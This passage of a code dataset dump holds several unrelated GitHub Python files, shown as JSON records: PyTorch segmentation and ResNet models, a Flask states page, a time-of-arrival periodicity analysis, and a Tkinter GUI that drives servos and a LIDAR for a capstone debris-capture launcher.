nn.ReLU(),\n nn.Linear(in_planes, in_planes), nn.Sigmoid())\n self.feature_inportance = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), nn.ReLU(),\n nn.Linear(in_planes, 1), nn.Sigmoid())\n self.edge_final = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=3, padding=1, bias=False)\n )\n self.corner_final = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=1, bias=False)\n )\n\n def forward(self, x):\n\n x_high, x_low = x # 8,8 16,16\n\n stride_ratio = x_low.shape[2] / x_high.shape[2]\n N, C, H, W = x_low.shape\n N_h, C_h, H_h, W_h = x_high.shape\n\n # edge part\n x_high_edge = x_high\n edge_pred = self.edge_final(x_high_edge)\n point_indices, point_coords = get_uncertain_point_coords_on_grid(edge_pred,\n num_points=self.edge_points) # torch.Size([2, K, 2])\n sample_x = point_indices % W_h * stride_ratio\n sample_y = point_indices // W_h * stride_ratio\n low_edge_indices = sample_x + sample_y * W\n low_edge_indices = low_edge_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_edge_feat = point_sample(x_high, point_coords) # torch.Size([2, 256, K])\n low_edge_feat = point_sample(x_low, point_coords)\n if self.gated:\n high_edge_feat = self.channel_gate(high_edge_feat.permute(0, 2, 1)) * high_edge_feat.permute(0, 2, 1)\n high_edge_feat = high_edge_feat.permute(0, 2, 1)\n low_edge_feat = self.channel_gate(low_edge_feat.permute(0, 2, 1)) * low_edge_feat.permute(0, 2, 1)\n low_edge_feat = low_edge_feat.permute(0, 2, 1)\n affinity_edge = torch.bmm(high_edge_feat.transpose(2, 1), low_edge_feat).transpose(2, 1)\n affinity = self.softmax(affinity_edge)\n high_edge_feat = torch.bmm(affinity, high_edge_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i = self.feature_inportance(high_edge_feat.permute(0, 2, 1))\n f_i = f_i.permute(0, 2, 1)\n fusion_edge_feat = f_i * high_edge_feat + (1 - f_i) * low_edge_feat\n else:\n fusion_edge_feat = high_edge_feat + low_edge_feat\n\n # corner part\n x_high_corner = x_high\n corner_pred = self.corner_final(x_high_corner)\n corner_point_indices, corner_point_coords = get_uncertain_point_coords_on_grid(corner_pred,\n num_points=self.corner_points)\n corner_sample_x = corner_point_indices % W_h * stride_ratio\n corner_sample_y = corner_point_indices // W_h * stride_ratio\n low_corner_indices = corner_sample_x + corner_sample_y * W\n low_corner_indices = low_corner_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_corner_feat = point_sample(x_high, corner_point_coords)\n low_corner_feat = point_sample(x_low, corner_point_coords)\n if self.gated:\n high_corner_feat = self.channel_gate(high_corner_feat.permute(0, 2, 1)) * high_corner_feat.permute(0, 2, 1)\n high_corner_feat = high_corner_feat.permute(0, 2, 1)\n low_corner_feat = self.channel_gate(low_corner_feat.permute(0, 2, 1)) * low_corner_feat.permute(0, 2, 1)\n low_corner_feat = low_corner_feat.permute(0, 2, 1)\n affinity_corner = torch.bmm(high_corner_feat.transpose(2, 1), low_corner_feat).transpose(2, 1)\n affinity_corner = self.softmax(affinity_corner)\n high_corner_feat = torch.bmm(affinity_corner, high_corner_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i_c = self.feature_inportance(high_corner_feat.permute(0, 2, 1))\n f_i_c = f_i_c.permute(0, 2, 1)\n fusion_corner_feat = f_i_c * high_corner_feat + (1 - f_i_c) * low_corner_feat\n else:\n fusion_corner_feat = high_corner_feat + low_corner_feat\n\n # GT Part\n if self.gt_tag == True:\n x_low = self.gt(x_low, x_high)\n\n final_features = x_low.reshape(N, C, H * W).scatter(2, low_edge_indices, fusion_edge_feat) # edge\n final_features = final_features.scatter(2, low_corner_indices, fusion_corner_feat) # corner\n final_features = final_features.view(N, C, H, W) #\n return final_features, edge_pred, corner_pred\n # end\n","repo_name":"zpl99/SGFANet","sub_path":"Nets/SGFANet/point_flow.py","file_name":"point_flow.py","file_ext":"py","file_size_in_byte":8407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"70914035610","text":"#!/usr/bin/python3\n\"\"\"Flask web application\nMust be listening on 0.0.0.0, port 5000\n\"\"\"\nfrom models import storage\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef states():\n \"\"\"Displays list of all State on HTML page\n \"\"\"\n states = storage.all(\"State\")\n return render_template(\"9-states.html\", state=states)\n\n\n@app.route(\"/states/\", strict_slashes=False)\ndef states_id(id):\n \"\"\"Displays a State with a given id on HTML page\"\"\"\n for state in storage.all(\"State\").values():\n if state.id == id:\n return render_template(\"9-states.html\", state=state)\n return render_template(\"9-states.html\")\n\n\n@app.teardown_appcontext\ndef teardown(exc):\n \"\"\"Remove current SQLAlchemy session\"\"\"\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","repo_name":"mesihg/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15698421047","text":"from models.select_channels import ChannelSelection\nimport torch.nn as nn\nimport torch\nimport math\n\n\n# [conv1in, conv1out=conv2in, conv2out=conv3in] (conv3out=planes*expansion)\n# cfg the channels after bn\ndefaultcfg = [[16, 16, 16], [64, 16, 16]*(18-1), [64, 32, 32], [128, 32, 32]*(18-1), [128, 64, 64],\n [256, 64, 64]*(18-1), [256]]\n\n__all__ = ['resnet164']\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, cfg, stride):\n super(Bottleneck, self).__init__()\n self.expansion = Bottleneck.expansion\n\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.select = ChannelSelection(inplanes)\n self.conv1 = nn.Conv2d(cfg[0], cfg[1], kernel_size=1, stride=1, bias=False)\n\n self.bn2 = nn.BatchNorm2d(cfg[1])\n self.conv2 = nn.Conv2d(cfg[1], cfg[2], kernel_size=3, stride=stride, padding=1, bias=False)\n\n self.bn3 = nn.BatchNorm2d(cfg[2])\n self.conv3 = nn.Conv2d(cfg[2], planes * self.expansion, kernel_size=1, stride=1, bias=False)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = nn.Identity()\n if stride != 1 or inplanes != planes * self.expansion:\n self.downsample = nn.Conv2d(inplanes, planes * self.expansion, kernel_size=1, stride=stride, bias=False)\n\n def forward(self, x):\n residual = self.downsample(x)\n\n out = self.bn1(x)\n out = self.select(out)\n out = self.relu(out)\n out = self.conv1(out)\n\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n out = self.bn3(out)\n out = self.relu(out)\n out = self.conv3(out)\n\n out += residual\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, num_class, cfg=None):\n super(ResNet, self).__init__()\n self.inplanes = 16\n if cfg is None:\n cfg = [item for sublist in defaultcfg for item in sublist]\n\n self.conv1 = nn.Conv2d(3, 16, 3, 1, 1, bias=False)\n self.stage1 = self.make_layers(Bottleneck, 16, 18, cfg[0: 18 * 3], 1)\n self.stage2 = self.make_layers(Bottleneck, 32, 18, cfg[18 * 3: 2 * 18 * 3], 2)\n self.stage3 = self.make_layers(Bottleneck, 64, 18, cfg[2 * 18 * 3: 3 * 18 * 3], 2)\n self.bn = nn.BatchNorm2d(64 * Bottleneck.expansion)\n self.select = ChannelSelection(64 * Bottleneck.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(cfg[-1], num_class)\n self._init_weights()\n\n def make_layers(self, Block, planes, blocks, cfg, stride):\n layers = []\n layers += [Block(self.inplanes, planes, cfg[0: 3], stride)]\n self.inplanes = planes * Block.expansion\n for i in range(1, blocks):\n layers += [Block(self.inplanes, planes, cfg[i * 3: i * 3 + 3], 1)]\n\n return nn.Sequential(*layers)\n\n def _init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(0.5)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.bias.data.zero_()\n m.weight.data.normal_(0, 0.01)\n\n def forward(self, x):\n out = self.conv1(x)\n\n out = self.stage1(out)\n out = self.stage2(out)\n out = self.stage3(out)\n\n out = self.bn(out)\n out = self.select(out)\n out = self.relu(out)\n\n out = self.avgpool(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n\n return out\n\n\ndef resnet164(cfg=None, num_class=100):\n return ResNet(num_class, cfg)\n\n\n# net = resnet164()\n# x = torch.rand(1, 3, 32, 32)\n# y = net(x)\n# print(y.shape)\n# for m in net.stage1[0].modules():\n# print(m)\n# print(net.stage1[0])\n\n","repo_name":"EstherBear/implementation-of-network-slimming","sub_path":"models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
+{"seq_id":"31517805329","text":"\"\"\"Time of Arrival Analysis.\"\"\"\n\nimport logging\nimport random\nimport warnings\nfrom pathlib import Path\nfrom typing import List\n\nimport numpy as np\nfrom numba import jit\nfrom numba.core.errors import NumbaPendingDeprecationWarning\nfrom tqdm import tqdm\n\nLOG_FORMAT: str = \"[%(asctime)s] %(levelname)s \"\nLOG_FORMAT += \"%(module)s::%(funcName)s():l%(lineno)d: \"\nLOG_FORMAT += \"%(message)s\"\nlogging.basicConfig(format=LOG_FORMAT, level=logging.ERROR)\nlog = logging.getLogger(__name__)\n# Supress deprecation messages\nwarnings.filterwarnings(action=\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=NumbaPendingDeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=UserWarning)\n\nFACTORIAL_LOOKUP_TABLE = np.array(\n [\n 1,\n 1,\n 2,\n 6,\n 24,\n 120,\n 720,\n 5040,\n 40320,\n 362880,\n 3628800,\n 39916800,\n 479001600,\n 6227020800,\n 87178291200,\n 1307674368000,\n 20922789888000,\n 355687428096000,\n 6402373705728000,\n 121645100408832000,\n 2432902008176640000,\n ],\n dtype=\"int64\",\n)\n\n\ndef frequency_grid(\n resolution: float = 0.00786432,\n samples: float = 536.0,\n oversample: int = 5,\n) -> np.ndarray:\n \"\"\"\n Generate frequency grid.\n\n Parameters\n ----------\n resolution : float, optional\n [description], by default 0.00786432\n samples : float, optional\n [description], by default 536.0\n oversample : int, optional\n [description], by default 5\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n spacing = 1.0 / (samples * resolution)\n nyquist = 0.5 * (1.0 / resolution)\n return np.arange(\n spacing,\n nyquist + (spacing / oversample),\n (spacing / oversample),\n )\n\n\n@jit(nopython=True)\ndef parameters(\n arrivals: List[float],\n chi: float,\n simulations: int = int(1e6),\n):\n \"\"\"\n Calculate the parameters for the workload .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int, optional\n [description], by default int(1e6)\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n # Convert\n toas = np.array(arrivals) * 0.001\n # np.empty is ~100x faster than np.zeros\n errors = np.zeros(len(toas)) * 0.001\n differences = np.zeros(len(toas) - 1)\n\n for index in np.arange(0, len(toas) - 1, 1):\n differences[index] = toas[index + 1] - toas[index]\n\n minimum = chi * differences.mean()\n maximum = (2.0 - chi) * differences.mean()\n return toas, errors, differences, minimum, maximum\n\n\n@jit(nopython=True)\ndef z2search(toas: np.ndarray, errors: np.ndarray, grid: np.ndarray) -> np.ndarray:\n \"\"\"\n Lightcurve search.\n\n Parameters\n ----------\n toas : np.ndarray\n [description]\n errors : np.ndarray\n [description]\n grid : np.ndarray\n [description]\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n z1 = np.zeros(grid.size, dtype=np.float64)\n for index in np.arange(0, len(grid), 1):\n phase = pulse_phase(toas, grid[index])\n z1[index] = z_n(phase, n=1)\n return z1\n\n\n@jit(nopython=True)\ndef pulse_phase(times, *frequency_derivatives):\n \"\"\"\n Calculate pulse phase from the frequency and its derivatives.\n\n Parameters\n ----------\n times : array of floats\n The times at which the phase is calculated\n *frequency_derivatives: floats\n List of derivatives in increasing order, starting from zero.\n\n Returns\n -------\n phases : array of floats\n The absolute pulse phase\n \"\"\"\n phase = np.zeros(len(times))\n for i_f, f in enumerate(frequency_derivatives):\n factorial = fast_factorial(i_f + 1)\n phase += 1 / factorial * times ** (i_f + 1) * f\n phase -= np.floor(phase)\n return phase\n\n\n@jit(nopython=True)\ndef fast_factorial(value: np.int64) -> np.int64:\n \"\"\"\n Factorial.\n\n Parameters\n ----------\n value : np.int64\n Some integer value.\n\n Returns\n -------\n np.int64\n\n Raises\n ------\n ValueError\n When value > 20.\n \"\"\"\n if value > 20:\n raise ValueError(\"fast_factorial for n>20, not supported.\")\n return FACTORIAL_LOOKUP_TABLE[value]\n\n\n@jit(nopython=True)\ndef z_n(phase: np.ndarray, n: int = 2, norm: float = 1.0):\n \"\"\"Z^2_n statistics, a` la Buccheri+03, A&A, 128, 245, eq. 2.\n\n Parameters\n ----------\n phase : array of floats\n The phases of the events\n n : int, default 2\n Number of harmonics, including the fundamental\n norm : float or array of floats\n A normalization factor that gets multiplied as a weight.\n\n Returns\n -------\n z2_n : float\n The Z^2_n statistics of the events.\n \"\"\"\n nbin = len(phase)\n if nbin == 0:\n return 0\n normalization = np.array(norm)\n if normalization.size == 1:\n total_norm = nbin * normalization\n else:\n total_norm = np.sum(normalization)\n phase = phase * 2 * np.pi\n return 2.0 / total_norm * statistic(n, phase, normalization)\n\n\n@jit(nopython=True)\ndef statistic(n, phase, norm):\n \"\"\"Calculate Z^2 Statistic.\"\"\"\n stat = np.zeros(n + 1, dtype=np.float64)\n for k in range(1, n + 1):\n stat[k - 1] = (\n np.sum(np.cos(k * phase) * norm) ** 2\n + np.sum(np.sin(k * phase) * norm) ** 2\n )\n return np.sum(stat)\n\n\n@jit(nopython=True)\ndef simulate(simulations: int, differences: np.ndarray, minimum: int, maximum: int):\n \"\"\"\n Generate simulated observations.\n\n Parameters\n ----------\n simulations : int\n [description]\n differences : np.ndarray\n [description]\n minimum : int\n [description]\n maximum : int\n [description]\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n differences_mc = np.zeros((int(simulations), len(differences)))\n toas_mc = np.zeros((int(simulations), len(differences) + 1))\n errors_mc = np.zeros((int(simulations), len(differences) + 1))\n\n for index in np.arange(0, int(simulations), 1):\n differences_mc[index] = np.random.uniform(minimum, maximum, len(differences))\n\n for index in np.arange(0, len(differences_mc), 1):\n toas_mc[index, 1:] = np.cumsum(differences_mc[index, :])\n\n return differences_mc, toas_mc, errors_mc\n\n\ndef save(data: np.ndarray, savepath: Path) -> None:\n \"\"\"\n Save np.ndarray.\n\n Parameters\n ----------\n data : np.ndarray\n savepath : Path\n \"\"\"\n filename = savepath.absolute().as_posix()\n np.savez(filename, max_z12_power=data)\n savepath.chmod(0o100666)\n\n\ndef execute(\n arrivals: List[float],\n chi: float,\n simulations: int,\n savepath: Path,\n debug: bool = False,\n) -> None:\n \"\"\"\n Run the simulation .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int\n [description]\n savepath: str\n [description]\n \"\"\"\n if debug:\n log.setLevel(logging.DEBUG)\n log.debug(\"Job Recieved: ✔️\")\n np.random.seed(random.SystemRandom().randint(0, 2147483647))\n log.debug(\"Random Seed : ✔️\")\n grid = frequency_grid()\n log.debug(\"Frequency Grid: ✔️\")\n toas, errors, differences, minimum, maximum = parameters(\n arrivals=arrivals,\n chi=chi,\n simulations=simulations,\n )\n log.debug(\"Parameters: ✔️\")\n differences_mc, toas_mc, errors_mc = simulate(\n simulations, differences, minimum, maximum\n )\n log.debug(\"Dataset: ✔️\")\n max_z12_power = np.zeros(len(toas_mc))\n\n for index in tqdm(\n np.arange(0, len(toas_mc), 1),\n ascii=True,\n desc=\"simulating\",\n leave=True,\n ):\n toa = toas_mc[index]\n error = errors_mc[index]\n z1 = z2search(toa, error, grid)\n max_index = np.argmax(z1)\n max_period = 1.0 / grid[max_index] # noqa: F841\n max_z12_power[index] = z1[max_index]\n log.debug(\"Simulations: ✔️\")\n save(max_z12_power, savepath)\n log.debug(\"Save: ✔️\")\n","repo_name":"CHIMEFRB/subpulse","sub_path":"subpulse/analysis/toa.py","file_name":"toa.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"5419705174","text":"# This is version 2 of the Control GUI for my Capstone project.\r\n# It includes a safety system for the fire control, an elevation indicator,\r\n# and the potential for linking to another camera to read the pressure gage.\r\n\r\n# OPERATIONAL NOTES:\r\n# The fire button only enables when all three checkboxes are checked, providing a triple-redundant safety.\r\n# The cinch button only enables after the fire button has been pressed.\r\n# The drag deploy button only enables after the cinch button has been pressed.\r\n\r\n# SPECIAL NOTE: If the fire, cinch, or drag buttons break, add a global definition directly above its first use inside a function.\r\n\r\nfrom __future__ import division # servo\r\nimport Tkinter as tk # GUI\r\nimport cv2 # Pressure Gage\r\nfrom PIL import Image, ImageTk # Pressure Gage\r\nimport time # servo and LIDAR\r\nimport math # servo\r\nimport Adafruit_PCA9685 # servo\r\nimport smbus # LIDAR\r\n\r\n# Some LIDAR initializers\r\nbus=smbus.SMBus(1)\r\naddr=0x62\r\n\r\n##import tkMessageBox as mb # This is just so that there is a dialog box that pops up to confirm the fire.\r\n\r\nroot = tk.Tk() # initialize the window.\r\nroot.geometry('590x420') # Sets the default window size\r\nroot.title(\"Control GUI\")\r\n\r\n# ****************************************************************************\r\n# This section contains the elevation indicator.\r\nelevationLabel = tk.Label(root, text = \"Elevation (deg):\", font = 20)\r\nelevationValue = tk.DoubleVar() # this holds the actual elevation value\r\neleValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the elevation.\r\n\r\ndef getElevation(elevation): # a function for changing the elevation value.\r\n elevationValue.set(elevation)\r\n\r\ndef updateEle(root, *args): # called when the elevation value is changed.\r\n eleValOut.config(text = elevationValue.get())\r\n\r\nelevationValue.trace(\"w\", updateEle)\r\n\r\nelevationLabel.grid(row=0, column=0)\r\neleValOut.grid(row=0, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the rotation indicator.\r\nrotationLabel = tk.Label(root, text = \"Rotation (deg):\", font = 20)\r\nrotationValue = tk.DoubleVar() # this holds the actual rotation value\r\nrotValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the rotation.\r\n\r\ndef getRotation(rotation): # a function for changing the rotation value.\r\n rotationValue.set(rotation)\r\n\r\ndef updateRot(root, *args): # called when the rotation value is changed.\r\n rotValOut.config(text = rotationValue.get())\r\n\r\nrotationValue.trace(\"w\", updateRot)\r\n\r\nrotationLabel.grid(row=1, column=0)\r\nrotValOut.grid(row=1, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the range indicator.\r\nrangeLabel = tk.Label(root, text = \"Distance to Target:\", font = 20)\r\nrangeValue = tk.DoubleVar() # this holds the actual range value\r\nranValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the range.\r\n\r\ndef getRange(dist): # a function for changing the range value.\r\n rangeValue.set(dist)\r\n\r\ndef updateRan(root, *args): # called when the range value is changed.\r\n ranValOut.config(text = rangeValue.get())\r\n\r\ndef rangeFind(): # This section is the LIDAR code\r\n t_end = time.time() + 5\r\n while time.time() < t_end:\r\n bus.write_byte_data(0x62,0x00, 0x04) \r\n val_high=bus.read_byte_data(0x62,0x0f) \r\n val_low=bus.read_byte_data(0x62,0x10) \r\n dist_cm=val_high*256+val_low\r\n dist_ft=dist_cm*0.0328084\r\n getRange(dist_ft)\r\n #print `dist_ft` + \" ft \"\r\n time.sleep(0.05)\r\n\r\nrangeValue.trace(\"w\", updateRan)\r\n\r\nuRanButton = tk.Button(root, text='Update Range', command=rangeFind)\r\n\r\nrangeLabel.grid(row=2, column=0)\r\nranValOut.grid(row=2, column=1)\r\nuRanButton.grid(row=2, column=2)\r\n\r\n# ****************************************************************************\r\n# This section contains the video for reading the pressure gage. It is purely optional.\r\n##picW = 320\r\n##picH = 214\r\n##ImageFrame=tk.Frame(root,width=picW,height=picH)\r\n##lmain=tk.Label(ImageFrame)\r\n##gageLabel = tk.Label(root, text = \"Pressure Gage:\", font = 20)\r\n##\r\n##cap=cv2.VideoCapture(0) # sets the camera\r\n##\r\n##def getVideo():\r\n## _,frame = cap.read()\r\n## hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n## hsv = cv2.resize(hsv, (picW, picH), interpolation=cv2.INTER_AREA)\r\n## img=Image.fromarray(hsv)\r\n## imgtk=ImageTk.PhotoImage(image=img)\r\n## lmain.imgtk=imgtk\r\n## lmain.configure(image=imgtk)\r\n## lmain.after(10,getVideo)\r\n## \r\n##getVideo() # This actually uses the camera to capture images. You may delete it.\r\n##gageLabel.grid(row=3, column=0)\r\n##ImageFrame.grid(row=3, column=1) # keep these locations the same.\r\n##lmain.grid(row=3, column=1) # keep these locations the same.\r\n\r\n# ****************************************************************************\r\n# This section contains the fire control and safety system.\r\n# these are the variables controlled by the checkboxes.\r\nflag1 = tk.BooleanVar()\r\nflag2 = tk.BooleanVar()\r\nflag3 = tk.BooleanVar()\r\nfireState = tk.BooleanVar(value=False)\r\n\r\ndef fire():\r\n # Insert whatever code we want here. It could just be a print statement.\r\n #mb.showinfo('FIRE', 'BOOM')\r\n print(\"BOOM\")\r\n fireState.set(True)\r\n\r\nfireButton = tk.Button(root, state=tk.DISABLED, text='Fire', command=fire) # sets the fire button to disabled by default.\r\n \r\ndef safetySys(root, *args): # The parameters of this function are automatically generated by the trace call.\r\n if all([flag1.get(), flag2.get(), flag3.get()]): # If all 3 checkboxes are checked, enable the fire button.\r\n fireButton.config(state=tk.NORMAL)\r\n else: # If not, disable the fire button for safety.\r\n fireButton.config(state=tk.DISABLED)\r\n\r\n# The locations of the safety boxes and fire button \r\ntk.Checkbutton(root, variable=flag1).grid(row=4, column=0)\r\ntk.Checkbutton(root, variable=flag2).grid(row=4, column=1)\r\ntk.Checkbutton(root, variable=flag3).grid(row=4, column=2)\r\nfireButton.grid(row=5, column=1)\r\n\r\n# These lines watch for a change in the variables controlled by the checkboxes.\r\nflag1.trace(\"w\", safetySys)\r\nflag2.trace(\"w\", safetySys)\r\nflag3.trace(\"w\", safetySys)\r\n\r\n# ****************************************************************************\r\n# This section contains the cinch control\r\ncinchState = tk.BooleanVar(value=False)\r\ndef cinch():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('CINCH', 'WHIRRRRRRRR')\r\n print(\"WHIRRRRRRRRR\")\r\n fireState.set(False)\r\n cinchState.set(True)\r\n\r\ncinchButton = tk.Button(root, state=tk.DISABLED, text='Cinch', command=cinch) # sets the cinch button to disabled by default\r\n\r\ndef enableCinch(root, *args): # if the fire button has been pressed, enable the cinch button.\r\n if fireState.get():\r\n cinchButton.config(state=tk.NORMAL) # enables the cinch button.\r\n else:\r\n cinchButton.config(state=tk.DISABLED)\r\n\r\nfireState.trace(\"w\", enableCinch) # when the fireState variable changes, check if you should enable the cinch button.\r\n\r\ncinchButton.grid(row=6, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the drag device control\r\ndef dragDeploy():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('Deploy Confirm', 'Junk Deorbiting')\r\n print(\"Junk Deorbiting\")\r\n\r\ndragButton = tk.Button(root, state=tk.DISABLED, text='Drag Device', command=dragDeploy) # sets the drag button to disabled by default\r\n\r\ndef enableDrag(root, *args): # if the cinch button has been pressed, enable the drag device button\r\n dragButton.config(state=tk.NORMAL) # enables the drag button.\r\n\r\ncinchState.trace(\"w\", enableDrag) # when the cinchState variable changes, check if you should enable the drag button.\r\n\r\ndragButton.grid(row=7, column=1)\r\n\r\n# ****************************************************************************\r\n### debug window. Manually change elevation and rotation.\r\n##dew = tk.Toplevel() # define an entirely seperate window for the entries\r\n##dew.geometry('320x75')\r\n##dew.title(\"Debug Window\")\r\n##deELab = tk.Label(dew, text = \"Enter Elevation:\", font = 20) # the labels\r\n##deRLab = tk.Label(dew, text = \"Enter Rotation:\", font = 20)\r\n##deRgLab = tk.Label(dew, text = \"Enter Range:\", font = 20)\r\n##\r\n##elevationEntry = tk.Entry(dew) # the entry fields\r\n##rotationEntry = tk.Entry(dew)\r\n##rangeEntry = tk.Entry(dew)\r\n##\r\n##def passEle(event):\r\n## getElevation(elevationEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##def passRot(event):\r\n## getRotation(rotationEntry.get()) # get the value in the field and pass it to the get function.\r\n## \r\n##def passRan(event):\r\n## getRange(rangeEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##elevationEntry.bind(\"\", passEle) # get the number in the entry field when enter is pressed.\r\n##rotationEntry.bind(\"\", passRot) # get the number in the entry field when enter is pressed.\r\n##rangeEntry.bind(\"\", passRan)\r\n##\r\n##deELab.grid(row=0, column=0)\r\n##elevationEntry.grid(row=0, column=1)\r\n##deRLab.grid(row=1, column=0)\r\n##rotationEntry.grid(row=1, column=1)\r\n##deRgLab.grid(row=2, column=0)\r\n##rangeEntry.grid(row=2, column=1)\r\n\r\n# ****************************************************************************\r\n# This section is for the motor motion.\r\npwm = Adafruit_PCA9685.PCA9685()\r\n\r\nminMotionX = 380 # The maximum servo motion left and right (pan)\r\nminMotionY = 150\r\nmaxMotionX = 470 # The maximum servo motion left and right (pan)\r\nmaxMotionY = 670 # The maximum servo motion up and down (tilt)\r\nmoveDis = 1 # Tells the key presses how far to move each time\r\n\r\ntiltSet = 530 # Sets start and end position of motor\r\npanSet = 413 # Sets start and end position of motor # 410\r\n\r\ncurX = panSet # Holds the current x position\r\ncurY = tiltSet # Holds the current y position # 400\r\n\r\npwm.set_pwm_freq(60) # Set frequency to 60hz, good for servos.\r\npwm.set_pwm(14, 14, panSet) # Set X starting position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y starting position # 387\r\nprint('Initializing servos on channel 0 and 1, \"X\" GUI window to quit...')\r\nprint('If cv2 color doesnt run: close the program, give it 5 seconds, then try again')\r\n\r\n# ------------------------------\r\n# Servo functions\r\ndef updatePos():\r\n \r\n pwm.set_pwm(15, 15, curY)\r\n\r\n # These Lines Translate curX,curY into reference (X,Y) coordinates for user\r\n coordX = curX-panSet\r\n coordY = -(curY-tiltSet) # Sign is flipped because Torxis motors read PWM backwards from mini servos\r\n## print(coordX,coordY) # Print current X,Y servo positions\r\n # These Lines output an angle from linear fit calibration based on known angles and PWM signals (coordY) \r\n pitchAngle = -.000003*coordY*coordY*coordY + .0016*coordY*coordY + .2399*coordY + .1111\r\n panAngle = .000002*coordX*coordX*coordX*coordX + .0001*coordX*coordX*coordX - .0041*coordX*coordX + 1.1562*coordX - 1.6779\r\n getElevation(pitchAngle)\r\n getRotation(panAngle)\r\n## print(panAngle,'Pan Degrees') # Diplays servo pan angle from zero\r\n## print(pitchAngle,'Tilt Degrees') # Displays servo pitch angle from local horizontal\r\n## print(' ') # To indent different displayed values per servo position\r\n \r\n pwm.set_pwm(14, 14, curX)\r\n return\r\n\r\ndef keyMotionUp(event):\r\n #print(\"Key Down\")\r\n global curY\r\n moveDis = 1\r\n curY -= moveDis\r\n if curY > maxMotionY: # The \"-21\" here is to keep the x on the screen. This may be deleted for the actual motors\r\n curY = maxMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionDown(event):\r\n #print(\"Key Up\")\r\n global curY\r\n moveDis = 1\r\n curY += moveDis\r\n if curY < minMotionY:\r\n curY = minMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionLeft(event):\r\n #print(\"Key Left\")\r\n global curX\r\n moveDis = 1\r\n curX -= moveDis\r\n if curX < minMotionX:\r\n curX = minMotionX\r\n updatePos()\r\n return\r\n\r\ndef keyMotionRight(event):\r\n #print(\"Key Right\")\r\n global curX\r\n moveDis = 1\r\n curX += moveDis\r\n if curX > maxMotionX - 12: # The \"-12\" here is to keep the x on the screen. This may be deleted for the actual motors\r\n curX = maxMotionX - 12\r\n updatePos()\r\n return\r\n# ---------------Fast Key Options-----------------\r\ndef keyMotionFastUp(event):\r\n #print(\"Key Down\")\r\n global curY\r\n moveDis = 5\r\n curY -= moveDis\r\n if curY > maxMotionY - 21:\r\n curY = maxMotionY - 21\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastDown(event):\r\n #print(\"Key Up\")\r\n global curY\r\n moveDis = 5\r\n curY += moveDis\r\n if curY < minMotionY:\r\n curY = minMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastLeft(event):\r\n #print(\"Key Left\")\r\n global curX\r\n moveDis = 5\r\n curX -= moveDis\r\n if curX < minMotionX:\r\n curX = minMotionX\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastRight(event):\r\n #print(\"Key Right\")\r\n global curX\r\n moveDis = 5\r\n curX += moveDis\r\n if curX > maxMotionX - 12: 